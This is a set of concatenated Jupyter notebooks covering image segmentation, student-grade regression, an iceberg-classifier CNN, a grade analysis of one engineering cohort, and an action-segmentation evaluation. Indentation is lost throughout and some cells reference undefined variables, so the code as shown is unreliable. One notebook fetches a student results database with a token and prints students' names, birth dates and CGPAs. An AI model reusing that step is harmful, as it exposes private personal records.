# stdb3=std3
print('final mean- ',mean1,mean2)
print('final strd- ',std1, std2)
# ## GAUSSIAN PLOT
# +
def gaussian(x, mu, sig):
return ((1/(sig*math.sqrt(2*math.pi)))*np.exp(-np.power(x - mu, 2.) / (2 * np.power(sig, 2.))))
x=list(range(0, 256))
mg1=np.array([meang1])
mg2=np.array([meang2])
# mg3=np.array([meang3])
sg1=np.array([stdg1])
sg2=np.array([stdg2])
# sg3=np.array([stdg3])
g1=gaussian(x, mg1, sg1)
g2=gaussian(x, mg2, sg2)
# g3=gaussian(x, mg3, sg3)
plt.plot(g1, 'g', linestyle='-')
plt.plot(g2, 'g', linestyle='--')
# plt.plot(g3, 'g', linestyle=':')
mr1=np.array([meanr1])
mr2=np.array([meanr2])
# mr3=np.array([meanr3])
sr1=np.array([stdr1])
sr2=np.array([stdr2])
# sr3=np.array([stdr3])
r1=gaussian(x, mr1, sr1)
r2=gaussian(x, mr2, sr2)
# r3=gaussian(x, mr3, sr3)
mb1=np.array([meanb1])
mb2=np.array([meanb2])
# mb3=np.array([meanb3])
sb1=np.array([stdb1])
sb2=np.array([stdb2])
# sb3=np.array([stdb3])
b1=gaussian(x, mb1, sb1)
b2=gaussian(x, mb2, sb2)
# b3=gaussian(x, mb3, sb3)
plt.plot(b1, 'b', linestyle='-')
plt.plot(b2, 'b', linestyle='--')
# plt.plot(b3, 'b', linestyle=':')
print(max(b1))
print(max(b2))
# print(max(b3))
print(max(g1))
print(max(g2))
# print(max(g3))
print(max(r1))
print(max(r2))
# print(max(r3))
plt.plot(r1, 'r',linestyle='-')
plt.plot(r2, 'r',linestyle='--')
# plt.plot(r3, 'r',linestyle=':')
plt.show()
# -
# ## TRIAL IMAGE SEGMENTATION
image=cv2.imread('frame.png')
plt.imshow(cv2.cvtColor(image,cv2.COLOR_BGR2RGB))
# +
print(max(b1))
print(max(b2))
# print(max(b3))
print(max(g1))
print(max(g2))
# print(max(g3))
print(max(r1))
print(max(r2))
# +
# image_g=image[:,:,1]
# image_r=image[:,:,2]
# image_b=image[:,:,0]
b,g,r=cv2.split(image)
img_out3=np.zeros(g.shape, dtype = np.uint8)
for index, v in np.ndenumerate(r):
x=b[index]
y=g[index]
if (g[v]>0.14) and (b2[x]>0.016 or b1[x]>0.015)and (r2[x]>0.016 or r1[x]>0.015):
img_out3[index]=255
else:
img_out3[index]=0
# -
plt.imshow(img_out3)
# +
ret, threshold3 = cv2.threshold(img_out3, 240, 255, cv2.THRESH_BINARY)
kernel3 = np.ones((2,2),np.uint8)
dilation3 = cv2.dilate(threshold3,kernel3,iterations =6)
contours3, _= cv2.findContours(dilation3, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
for contour in contours3:
if cv2.contourArea(contour) > 20:
(x,y),radius = cv2.minEnclosingCircle(contour)
center = (int(x),int(y))
radius = int(radius)
# print(radius)
if radius > 13:
print(radius)
cv2.circle(image,center,radius,(0,0,255),2)
# -
plt.imshow(cv2.cvtColor(image,cv2.COLOR_BGR2RGB))
|
Code/GMM Estimation Notebook/yellowEstimate.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
df_mat = pd.read_csv("student-mat.csv", sep=";")
df_por = pd.read_csv("student-por.csv", sep=";")
df.head()
# -
# !ls
df_mat.columns
df_mat.shape
y = df_mat["G3"]
X = df_mat.drop(labels=["G1", "G2", "G3"], axis=1)
sns.pairplot(df_mat.drop(labels=["G1", 'failures', 'schoolsup', 'famsup', 'paid', 'activities', 'nursery',
'higher', 'internet', 'romantic', 'famrel', 'freetime', 'goout', 'Dalc', "G2"], axis=1))
sns.pairplot(df_mat.drop(labels=['school', 'sex', 'age', 'address', 'famsize', 'Pstatus', 'Medu', 'Fedu',
'Mjob', 'Fjob', 'reason', 'guardian', 'traveltime', 'studytime', "G1", "G2"], axis=1))
# # Pairplot
#
# - All discretes variables
# - Grade seems "normally distributed"
# - No so much data
# - Need encoding of text values
from sklearn.preprocessing import OneHotEncoder
enc = OneHotEncoder(handle_unknown='ignore')
enc.fit(X).categories_
correlations = df_mat.corr(method='pearson')
print(correlations)
sns.heatmap(correlations)
X
# +
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder, LabelEncoder
from sklearn.metrics import r2_score
from sklearn.model_selection import train_test_split as tts
def score_model(X, y, estimator, **kwargs):
"""
Test various estimators.
"""
#y = LabelEncoder().fit_transform(y)
model = Pipeline([
('one_hot_encoder', OneHotEncoder()),
('estimator', estimator)
])
# Instantiate the classification model and visualizer
model.fit(X, y, **kwargs)
expected = y
predicted = model.predict(X)
# Compute and return F1 (harmonic mean of precision and recall)
print("{}: {}".format(estimator.__class__.__name__, r2_score(expected, predicted)))
models = [
RandomForestRegressor(n_estimators=100)
]
for model in models:
score_model(X, y, model)
# -
Nice overfit
# +
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder, LabelEncoder
from sklearn.metrics import r2_score
from sklearn.model_selection import train_test_split as tts
from yellowbrick.regressor import ResidualsPlot
from sklearn.ensemble import RandomForestRegressor
def score_model(X, y, estimator, **kwargs):
"""
Test various estimators.
"""
#y = LabelEncoder().fit_transform(y)
model = Pipeline([
('one_hot_encoder', OneHotEncoder()),
('estimator', estimator)
])
# Instantiate the classification model and visualizer
visualizer = ResidualsPlot(
model
)
X_train, X_test, y_train, y_test = tts(X, y, test_size=0.10)
visualizer.fit(X_train, y_train)
visualizer.score(X_test, y_test)
visualizer.show()
# Compute and return F1 (harmonic mean of precision and recall)
#print("{}: {}".format(estimator.__class__.__name__, r2_score(expected, predicted)))
models = [
RandomForestRegressor(n_estimators=100, ccp_alpha = 0.1)
]
for model in models:
score_model(X, y, model)
# -
# about 500 grades
#
# about 30 features
#
# > overfitting
# +
ccp_alphas = [1, 10, 5, 0.5, 0.1, 1]
for ccp_alpha in ccp_alphas:
models = [
RandomForestRegressor(n_estimators=100, ccp_alpha = ccp_alpha)
]
for model in models:
print("cc alpha {} ".format(ccp_alpha))
score_model(X, y, model)
# -
|
ADS-Summer2020_Cohort 18/student/education.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # CNN_10channel
#
# Abstract:
# - single channel: band_avg
# - CNN, small net
#
# Result:
# - Kaggle score:
#
# References:
# - https://www.kaggle.com/ivalmian/simple-svd-xgboost-baseline-lb-35
# - https://www.kaggle.com/arieltci/a-keras-prototype-0-21174-on-pl
# ## 1. Preprocess
# ### Import pkgs
# +
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import log_loss, accuracy_score
from IPython.display import display
# %matplotlib inline
# -
import os
import time
import zipfile
import lzma
import pickle
from PIL import Image
from shutil import copy2
# ### Run name
project_name = 'SC_Iceberg_Classifier'
step_name = 'CNN_4channel'
date_str = time.strftime("%Y%m%d", time.localtime())
time_str = time.strftime("%Y%m%d_%H%M%S", time.localtime())
run_name = project_name + '_' + step_name + '_' + time_str
print('run_name: ' + run_name)
# ### Basic folders
cwd = os.getcwd()
input_path = os.path.join(cwd, 'input')
log_path = os.path.join(cwd, 'log')
model_path = os.path.join(cwd, 'model')
output_path = os.path.join(cwd, 'output')
print('input_path: ' + input_path)
print('log_path: ' + log_path)
print('model_path: ' + model_path)
print('output_path: ' + output_path)
# ### Load data
sample_submission_path = os.path.join(input_path, 'sample_submission.csv')
sample_submission = pd.read_csv(sample_submission_path)
print(sample_submission.shape)
sample_submission.head(2)
# +
is_iceberg_path = os.path.join(input_path, 'is_iceberg.p')
y_data = pickle.load(open(is_iceberg_path, mode='rb'))
print(y_data.shape)
# +
# %%time
#Load orignal data
inc_angle_data_path = os.path.join(input_path, 'inc_angle_data.p')
inc_angle_test_path = os.path.join(input_path, 'inc_angle_test.p')
inc_angle_data = pickle.load(open(inc_angle_data_path, mode='rb'))
inc_angle_test = pickle.load(open(inc_angle_test_path, mode='rb'))
print(inc_angle_data.shape)
print(inc_angle_test.shape)
# +
# %%time
#Load orignal data
band1_data_path = os.path.join(input_path, 'band1_data.p')
band2_data_path = os.path.join(input_path, 'band2_data.p')
band_avg_data_path = os.path.join(input_path, 'band_avg_data.p')
band1_test_path = os.path.join(input_path, 'band1_test.p')
band2_test_path = os.path.join(input_path, 'band2_test.p')
band_avg_test_path = os.path.join(input_path, 'band_avg_test.p')
band1_data = pickle.load(open(band1_data_path, mode='rb'))
band2_data = pickle.load(open(band2_data_path, mode='rb'))
band_avg_data = pickle.load(open(band_avg_data_path, mode='rb'))
band1_test = pickle.load(open(band1_test_path, mode='rb'))
band2_test = pickle.load(open(band2_test_path, mode='rb'))
band_avg_test = pickle.load(open(band_avg_test_path, mode='rb'))
print(band1_data.shape)
print(band2_data.shape)
print(band_avg_data.shape)
print(band1_test.shape)
print(band2_test.shape)
print(band_avg_test.shape)
# +
# %%time
#Load orignal data
band1_data_edges_path = os.path.join(input_path, 'band1_data_edges.p')
band2_data_edges_path = os.path.join(input_path, 'band2_data_edges.p')
band_avg_data_edges_path = os.path.join(input_path, 'band_avg_data_edges.p')
band1_test_edges_path = os.path.join(input_path, 'band1_test_edges.p')
band2_test_edges_path = os.path.join(input_path, 'band2_test_edges.p')
band_avg_test_edges_path = os.path.join(input_path, 'band_avg_test_edges.p')
band1_data_edges = pickle.load(open(band1_data_edges_path, mode='rb'))
band2_data_edges = pickle.load(open(band2_data_edges_path, mode='rb'))
band_avg_data_edges = pickle.load(open(band_avg_data_edges_path, mode='rb'))
band1_test_edges = pickle.load(open(band1_test_edges_path, mode='rb'))
band2_test_edges = pickle.load(open(band2_test_edges_path, mode='rb'))
band_avg_test_edges = pickle.load(open(band_avg_test_edges_path, mode='rb'))
print(band1_data_edges.shape)
print(band2_data_edges.shape)
print(band_avg_data_edges.shape)
print(band1_test_edges.shape)
print(band2_test_edges.shape)
print(band_avg_test_edges.shape)
# +
# %%time
#Load orignal data
band1_data_gabor_path = os.path.join(input_path, 'band1_data_gabor.p')
band2_data_gabor_path = os.path.join(input_path, 'band2_data_gabor.p')
band_avg_data_gabor_path = os.path.join(input_path, 'band_avg_data_gabor.p')
band1_test_gabor_path = os.path.join(input_path, 'band1_test_gabor.p')
band2_test_gabor_path = os.path.join(input_path, 'band2_test_gabor.p')
band_avg_test_gabor_path = os.path.join(input_path, 'band_avg_test_gabor.p')
band1_data_gabor = pickle.load(open(band1_data_gabor_path, mode='rb'))
band2_data_gabor = pickle.load(open(band2_data_gabor_path, mode='rb'))
band_avg_data_gabor = pickle.load(open(band_avg_data_gabor_path, mode='rb'))
band1_test_gabor = pickle.load(open(band1_test_gabor_path, mode='rb'))
band2_test_gabor = pickle.load(open(band2_test_gabor_path, mode='rb'))
band_avg_test_gabor = pickle.load(open(band_avg_test_gabor_path, mode='rb'))
print(band1_data_gabor.shape)
print(band2_data_gabor.shape)
print(band_avg_data_gabor.shape)
print(band1_test_gabor.shape)
print(band2_test_gabor.shape)
print(band_avg_test_gabor.shape)
# -
# %%time
x_data = np.concatenate([band1_data[:, :, :, np.newaxis],
band2_data[:, :, :, np.newaxis],
band_avg_data[:, :, :, np.newaxis]], axis=-1)
print(x_data.shape)
x_test = np.concatenate([band1_test[:, :, :, np.newaxis],
band2_test[:, :, :, np.newaxis],
band_avg_test[:, :, :, np.newaxis],], axis=-1)
print(x_test.shape)
# +
# # %%time
# x_data = np.concatenate([band1_data[:, :, :, np.newaxis],
# band2_data[:, :, :, np.newaxis],
# band_avg_data[:, :, :, np.newaxis],
# band1_data_edges[:, :, :, np.newaxis],
# band2_data_edges[:, :, :, np.newaxis],
# band_avg_data_edges[:, :, :, np.newaxis],
# band1_data_gabor[:, :, :, np.newaxis],
# band2_data_gabor[:, :, :, np.newaxis],
# band_avg_data_gabor[:, :, :, np.newaxis]], axis=-1)
# print(x_data.shape)
# x_test = np.concatenate([band1_test[:, :, :, np.newaxis],
# band2_test[:, :, :, np.newaxis],
# band_avg_test[:, :, :, np.newaxis],
# band1_test_edges[:, :, :, np.newaxis],
# band2_test_edges[:, :, :, np.newaxis],
# band_avg_test_edges[:, :, :, np.newaxis],
# band1_test_gabor[:, :, :, np.newaxis],
# band2_test_gabor[:, :, :, np.newaxis],
# band_avg_test_gabor[:, :, :, np.newaxis]], axis=-1)
# print(x_test.shape)
# -
# %%time
x_train, x_val, inc_angle_train, inc_angle_val, y_train, y_val = train_test_split(x_data, inc_angle_data, y_data, test_size=0.15, shuffle=True, random_state=31)
print(x_train.shape)
print(x_val.shape)
print(inc_angle_train.shape)
print(inc_angle_val.shape)
print(y_train.shape)
print(y_val.shape)
# ## 2. Build model
from keras.utils.np_utils import to_categorical # convert to one-hot-encoding
from keras.models import Sequential, Model
from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D, GlobalMaxPooling2D, BatchNormalization, Input
from keras.layers.merge import Concatenate
from keras.optimizers import Adam
from keras.preprocessing.image import ImageDataGenerator
from keras.callbacks import LearningRateScheduler, TensorBoard
def build_model():
model = Sequential()
model.add(Conv2D(filters = 64, kernel_size = (3, 3), activation='relu',
input_shape = (75, 75, 3)))
model.add(BatchNormalization())
model.add(Conv2D(filters = 64, kernel_size = (3, 3), activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(strides=(2,2)))
model.add(Dropout(0.25))
model.add(Conv2D(filters = 128, kernel_size = (3, 3), activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(filters = 128, kernel_size = (3, 3), activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(strides=(2,2)))
model.add(Dropout(0.25))
model.add(Conv2D(filters = 256, kernel_size = (3, 3), activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(filters = 256, kernel_size = (3, 3), activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(strides=(2,2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(4096, activation='relu'))
model.add(Dropout(0.25))
model.add(Dense(4096, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(units = 1, activation = 'sigmoid'))
model.compile(optimizer = Adam(lr=1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])
return model
model = build_model()
model.summary()
def saveModel(model, run_name):
cwd = os.getcwd()
modelPath = os.path.join(cwd, 'model')
if not os.path.isdir(modelPath):
os.mkdir(modelPath)
weigthsFile = os.path.join(modelPath, run_name + '.h5')
model.save(weigthsFile)
saveModel(model, 'saveModel_test')
# +
def get_lr(x):
lr = round(1e-4 * 0.98 ** x, 6)
if lr < 5e-5:
lr = 5e-5
print(lr, end=' ')
return lr
# annealer = LearningRateScheduler(lambda x: 1e-3 * 0.9 ** x)
annealer = LearningRateScheduler(get_lr)
log_dir = os.path.join(log_path, run_name)
print('log_dir:' + log_dir)
tensorBoard = TensorBoard(log_dir=log_dir)
# -
datagen = ImageDataGenerator(
rotation_range=0,
width_shift_range=0,
height_shift_range=0,
horizontal_flip=False,
vertical_flip=False)
# %%time
hist = model.fit_generator(datagen.flow(x_train, y_train, batch_size=8, shuffle = True),
steps_per_epoch=len(x_train) / 8,
epochs = 200, #1 for ETA, 0 for silent
verbose= 1,
max_queue_size= 16,
workers= 8,
validation_data=(x_val, y_val),
callbacks=[annealer, tensorBoard])
# hist = model.fit_generator([x_train, inc_angle_train], y_train,
# batch_size = 8,
# verbose= 1,
# epochs = 30, #1 for ETA, 0 for silent
# validation_data=([x_val, inc_angle_val], y_val),
# callbacks=[tensorBoard])
final_loss, final_acc = model.evaluate(x_val, y_val, verbose=1)
print("Final loss: {0:.4f}, final accuracy: {1:.4f}".format(final_loss, final_acc))
# +
val_prob1 = model.predict(x_val)
# print('Val log_loss: {}'.format(log_loss(y_val, val_prob1)))
val_prob1_limit = np.clip(val_prob1, 0.00005, 0.99995)
loss = log_loss(y_val, val_prob1_limit)
print('Val log_loss: {}'.format(loss))
val_prob1_limit = np.clip(val_prob1_limit, 0.05, 0.95)
loss = log_loss(y_val, val_prob1_limit)
print('Val log_loss: {}'.format(loss))
# -
final_acc_str = str(int(loss*10000))
run_name_acc = project_name + '_' + step_name + '_' + time_str + '_' + final_acc_str
print(run_name_acc)
histories = pd.DataFrame(hist.history)
histories['epoch'] = hist.epoch
print(histories.columns)
histories_file = os.path.join(model_path, run_name_acc + '.csv')
histories.to_csv(histories_file, index=False)
plt.plot(histories['loss'], color='b')
plt.plot(histories['val_loss'], color='r')
plt.show()
plt.plot(histories['acc'], color='b')
plt.plot(histories['val_acc'], color='r')
plt.show()
saveModel(model, run_name_acc)
# ## 3. Predict
if not os.path.exists(output_path):
os.mkdir(output_path)
pred_file = os.path.join(output_path, run_name_acc + '.csv')
print(pred_file)
test_prob = model.predict(x_test)
print(test_prob.shape)
print(test_prob[0:2])
test_prob = np.clip(test_prob, 0.05, 0.95)
print(test_prob.shape)
print(test_prob[0:2])
sample_submission['is_iceberg'] = test_prob
print(sample_submission[0:2])
print(sample_submission.shape)
sample_submission.to_csv(pred_file, index=False)
print(run_name_acc)
print('Done!')
|
statoil-iceberg-classifier-challenge/CNN_10channel.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # B.Tech 2016-20 Electrical Enginnering (Spring 2018)
# %matplotlib inline
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import datetime as dt
import requests, os, json
# +
stres = "https://result-data.firebaseio.com/.json"
stres += "?auth=" + os.environ["token"]
course = "https://raw.githubusercontent.com/nightawks/scrapper/master/data/course.json"
data = requests.get(url=stres).json()
cdata = requests.get(url=course).json()
#Filter 16EE data
data = {k:v for (k,v) in data.items() if '16EE' in k[:4]}
# with open('../../../data/course.json') as c:
# cdata = json.load(c)
# print ("Total Stuents: %s" % len(data))
# -
# ## Date of Birth analysis
if len(data) != 0:
dob = [v['dob'] for (k, v) in data.items()]
np_dob = (np.array(dob, dtype='datetime64[s]').view('i8'))
average_dob = np.mean(np_dob).astype('datetime64[s]').astype(dt.datetime)
median_dob = np.median(np_dob).astype('datetime64[s]').astype(dt.datetime)
minimum_dob = np.min(np_dob).astype('datetime64[s]').astype(dt.datetime)
maximum_dob = np.max(np_dob).astype('datetime64[s]').astype(dt.datetime)
print (" Average: %s" % average_dob.strftime("%8B %d, %Y"))
print (" Median: %s" % median_dob.strftime("%8B %d, %Y"))
print (" Oldest: %s" % minimum_dob.strftime("%8B %d, %Y"))
print ("Youngest: %s" % maximum_dob.strftime("%8B %d, %Y"))
# ## Branch Change Analysis
if len(data) != 0:
original_strengeth = 40
bc_cgpa = [v['cgpa'][1] for (k, v) in data.items() if int(k[-2:]) > 40]
bc_cgpa = (np.array(bc_cgpa, dtype='float'))
bc_count = bc_cgpa.size
bc_highest = np.max(bc_cgpa)
bc_lowest = np.min(bc_cgpa)
bc_average = np.mean(bc_cgpa)
bc_median = np.median(bc_cgpa)
print ("Total branch changers: %s" % bc_count)
print ("\nCGPA (after 2nd sem) for branch change:-")
print ("Highest: %s" % bc_highest)
print (" Lowest: %s" % bc_lowest)
print ("Average: %s" % bc_average)
print (" Median: %s" % bc_median)
# ## Course wise analysis
if len(data) != 0:
courses = dict()
for (k, v) in data.items():
for (sem, scourses) in v['grades'].items():
for (course, grade) in scourses.items():
if course not in courses:
courses[course] = list()
courses[course].append(grade)
else:
courses[course].append(grade)
clist = list()
def other_grade(l):
return len(l) - l.count('EX') - l.count('A') - l.count('B') - l.count('C') - l.count('D') - l.count('P') - l.count('F') - l.count('WH')
def analyze_grade(l):
grade_hash = {'EX': 10, 'A': 9, 'B': 8, 'C': 7, 'D': 6, 'P': 5, 'F': 5}
hashed_grade = list()
for grade in l:
if grade in grade_hash:
hashed_grade.append(grade_hash[grade])
hashed_grade = (np.array(hashed_grade, dtype='float'))
if hashed_grade.size == 0:
return {'average': 0, 'median': 0}
return {'average': round(np.mean(hashed_grade), 2), 'median': round(np.median(hashed_grade), 2)}
grade_labels = 'EX', 'A', 'B', 'C', 'D', 'P', 'F', 'WH', 'Other'
colors = ['gold', 'yellowgreen', 'lightcoral', 'lightskyblue', 'orange', 'red', 'gray', 'black']
for course, grades in courses.items():
course_info = cdata[course]
clist.append((course, course_info['subnane'], course_info['credit'], len(grades), grades.count('EX'), grades.count('A'),
grades.count('B'), grades.count('C'), grades.count('D'), grades.count('P'),
grades.count('F'), grades.count('WH'), other_grade(grades), analyze_grade(grades)['average'], analyze_grade(grades)['median']))
# patches, texts = plt.pie([grades.count('EX'), grades.count('A'),
# grades.count('B'), grades.count('C'), grades.count('D'), grades.count('P'),
# grades.count('F'), grades.count('WH'), other_grade(grades)], labels=grade_labels, colors=colors)
# plt.axis('equal')
# plt.legend(patches, labels, loc="best")
# plt.show()
def sortByAverage(element):
return element[-2]
clist.sort(key=sortByAverage)
df = pd.DataFrame(data = clist)
df.columns = ['Subject Code', 'Subject Name', 'Credits', 'Students', 'EX', 'A', 'B', 'C', 'D', 'P', 'F', 'WH', 'Other', 'Average', 'Median']
df
# ## CGPA Analysis
if len(data) != 0:
cgpa = list()
for (k, v) in data.items():
try:
cgpa.append((float(v['cgpa'][-1]), k))
except:
pass
def sortbycg(l):
return l[0]
cgpa.sort(key=sortbycg)
print("Top 5 Students:\n")
for element in cgpa[:-6:-1]:
print('%s' % (data[element[1]]['name']))
cgpa = np.array([element[0] for element in cgpa], dtype='float')
cgpa_average = round(np.mean(cgpa), 2)
cgpa_median = round(np.median(cgpa), 2)
cgpa_highest = round(np.max(cgpa), 2)
print("\nCGPA:")
print("Highest: %s" % cgpa_highest)
print(" Median: %s" % cgpa_median)
print("Average: %s" % cgpa_average)
print(" 9.5+: %s" % len([cg for cg in cgpa if cg >= 9.5]))
print(" 9-9.5: %s" % len([cg for cg in cgpa if cg >= 9 and cg < 9.5]))
print(" 8.5-9: %s" % len([cg for cg in cgpa if cg >= 8.5 and cg < 9]))
print(" 8-8.5: %s" % len([cg for cg in cgpa if cg >= 8 and cg < 8.5]))
print(" 7.5-8: %s" % len([cg for cg in cgpa if cg >= 7.5 and cg < 8]))
print(" 7-7.5: %s" % len([cg for cg in cgpa if cg >= 7 and cg < 7.5]))
print(" 7-: %s" % len([cg for cg in cgpa if cg < 7]))
|
notebooks/year/2016/16EE.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: hasr
# language: python
# name: hasr
# ---
# +
import numpy as np
import os
import sys
import copy
import math
import csv
import torch
import random
import sys
sys.path.append('./backbones/asrf')
from libs import models
from libs.optimizer import get_optimizer
from libs.dataset import ActionSegmentationDataset, collate_fn
from libs.transformer import TempDownSamp, ToTensor
from libs.postprocess import PostProcessor
sys.path.append('./backbones/ms-tcn')
from model import MultiStageModel
sys.path.append('./backbones')
sys.path.append('./backbones/SSTDA')
from SSTDA.model import MultiStageModel as MSM_SSTDA
from src.utils import eval_txts, load_meta
from src.predict import predict_refiner
from src.refiner_train import refiner_train
from src.refiner_model import RefinerModel
from src.mgru import mGRU
import configs.refiner_config as cfg
import configs.sstda_config as sstda_cfg
import configs.asrf_config as asrf_cfg
import matplotlib.pyplot as plt
# -
dataset_names = ['gtea', '50salads', 'breakfast']
backbone_names = ['asrf', 'mstcn', 'sstda', 'mgru']
num_splits = dict()
num_splits['gtea'] = 4
num_splits['50salads']=5
num_splits['breakfast']=4
curr_refiner = 'refinerMSTCN-mstcn'
curr_backbone = 'mstcn'
dataset = 'gtea'
split = 4
# +
record_root = './record'
refiner_best_epoch = dict()
for dir_name in sorted([x for x in os.listdir(record_root) if x[0]!='.']):
backbone_name = ''.join([t for t in dir_name if t.isupper()]).lower()
if len(backbone_name) > 0:
refiner_best_epoch[dir_name] = {dn:[] for dn in dataset_names}
for data_name in os.listdir(os.path.join(record_root, dir_name)):
csv_list = os.listdir(os.path.join(record_root, dir_name, data_name))
plot_flag = True
for i in range(num_splits[data_name]):
if 'split_{}_best.csv'.format(i+1) not in csv_list:
plot_flag = False
if plot_flag:
curr_score = np.asarray([0.0 for _ in range(5)])
backbone_score = np.asarray([0.0 for _ in range(5)])
for i in range(num_splits[data_name]):
curr_csv_fp = os.path.join(record_root, dir_name, data_name, 'split_{}_best.csv'.format(i+1))
backbone_csv_fp = os.path.join(record_root, backbone_name, data_name, 'split_{}_best.csv'.format(i+1))
with open(curr_csv_fp, 'r') as f:
reader = csv.reader(f, delimiter='\t')
for ri, row in enumerate(reader):
if ri>0:
refiner_best_epoch[dir_name][data_name].append(int(row[0]))
curr_score += np.asarray([float(r) for r in row[1:]]) / num_splits[data_name]
# -
device = 'cuda'
actions_dict, \
num_actions, \
gt_path, \
features_path, \
vid_list_file, \
vid_list_file_tst, \
sample_rate,\
model_dir,\
result_dir, \
record_dir = load_meta(cfg.dataset_root, cfg.model_root, cfg.result_root, cfg.record_root,
dataset, split, curr_refiner)
curr_split_dir = os.path.join(cfg.dataset_root, dataset, 'splits')
split_dict = {k+1:[] for k in range(cfg.num_splits[dataset])}
for i in range(eval('cfg.num_splits["{}"]'.format(dataset))):
curr_fp = os.path.join(curr_split_dir, 'test.split{}.bundle'.format(i+1))
f = open(curr_fp, 'r')
lines = f.readlines()
for l in lines:
curr_name = l.split('.')[0]
split_dict[i+1].append(curr_name)
f.close()
# +
pool_backbones = {bn: {k+1:None for k in range(cfg.num_splits[dataset])} for bn in cfg.backbone_names}
for i in range(eval('cfg.num_splits["{}"]'.format(dataset))):
if 'asrf' in cfg.backbone_names:
curr_asrf = models.ActionSegmentRefinementFramework(
in_channel = cfg.in_channel,
n_features = cfg.n_features,
n_classes = num_actions,
n_stages = cfg.n_stages,
n_layers = cfg.n_layers,
n_stages_asb = cfg.n_stages_asb,
n_stages_brb = cfg.n_stages_brb
)
curr_asrf.load_state_dict(torch.load(os.path.join(cfg.model_root, 'asrf', dataset,
'split_{}'.format(i+1),
'epoch-{}.model'.format(cfg.best['asrf'][dataset][i]))))
curr_asrf.to(device)
pool_backbones['asrf'][i+1] = curr_asrf
if 'mstcn' in cfg.backbone_names:
curr_mstcn = MultiStageModel(cfg.num_stages,
num_layers = cfg.num_layers,
num_f_maps = cfg.num_f_maps,
dim = cfg.features_dim,
num_classes = num_actions)
curr_mstcn.load_state_dict(torch.load(os.path.join(cfg.model_root, 'mstcn', dataset,
'split_{}'.format(i+1),
'epoch-{}.model'.format(cfg.best['mstcn'][dataset][i]))))
curr_mstcn.to(device)
pool_backbones['mstcn'][i+1] = curr_mstcn
if 'sstda' in cfg.backbone_names:
curr_sstda = MSM_SSTDA(sstda_cfg, num_actions)
curr_sstda.load_state_dict(torch.load(os.path.join(cfg.model_root, 'sstda', dataset,
'split_{}'.format(i+1),
'epoch-{}.model'.format(cfg.best['sstda'][dataset][i]))))
curr_sstda.to(device)
pool_backbones['sstda'][i+1] = curr_sstda
if 'mgru' in cfg.backbone_names:
curr_mgru = mGRU(num_layers=cfg.gru_layers,
feat_dim=cfg.gru_hidden_dim,
inp_dim=cfg.in_channel,
out_dim=num_actions)
curr_mgru.load_state_dict(torch.load(os.path.join(cfg.model_root, 'mgru', dataset,
'split_{}'.format(i+1),
'epoch-{}.model'.format(cfg.best['mgru'][dataset][i]))))
curr_mgru.to(device)
pool_backbones['mgru'][i+1] = curr_mgru
main_backbones = copy.deepcopy(pool_backbones[curr_backbone])
# -
model = RefinerModel(num_actions = num_actions,
input_dim = cfg.features_dim,
feat_dim = cfg.hidden_dim,
num_highlevel_frames = cfg.num_highlevel_frames,
num_highlevel_samples = cfg.num_highlevel_samples,
device = device)
model.load_state_dict(torch.load(os.path.join(cfg.model_root, curr_refiner,
dataset, 'split_{}'.format(split),
'epoch-{}.model'.format(refiner_best_epoch[curr_refiner][dataset][split-1]))))
model.to(device)
# +
def get_segment_idx(segment_res):
segment_time = [0]
segment_ind = [segment_res[0]]
for i, s in enumerate(segment_res):
if s != segment_ind[-1]:
segment_time.append(i)
segment_ind.append(s)
segment_time.append(len(segment_res))
return segment_time, segment_ind
def get_name(ind_list, actions_dict):
name_list = []
for ind in ind_list:
name_list += [key for key in actions_dict if actions_dict[key]==ind]
return name_list
def color_map(N=256, normalized=True):
def bitget(byteval, idx):
return ((byteval & (1 << idx)) != 0)
dtype = 'float32' if normalized else 'uint8'
cmap = np.zeros((N, 3), dtype=dtype)
for i in range(N):
r = g = b = 0
c = i
for j in range(8):
r = r | (bitget(c, 0) << 7-j)
g = g | (bitget(c, 1) << 7-j)
b = b | (bitget(c, 2) << 7-j)
c = c >> 3
cmap[i] = np.array([r, g, b])
cmap = cmap/255 if normalized else cmap
return cmap
N = len(actions_dict)
RGB_tuples = color_map(100)
print(N)
# -
def plot_prediction(model, main_backbone_name, backbones, split_dict, model_dir, result_dir, gt_path, features_path, vid_list_file, actions_dict, device, sample_rate):
model.eval()
with torch.no_grad():
file_ptr = open(vid_list_file, 'r')
list_of_vids = file_ptr.read().split('\n')[:-1]
file_ptr.close()
total_seg = 0
total_wrong = 0
for vid in list_of_vids:
print(vid)
f = open(os.path.join(gt_path, vid), 'r')
lines = f.readlines()
gt_segment = []
for l in lines:
gt_segment.append(actions_dict[l[:-1]])
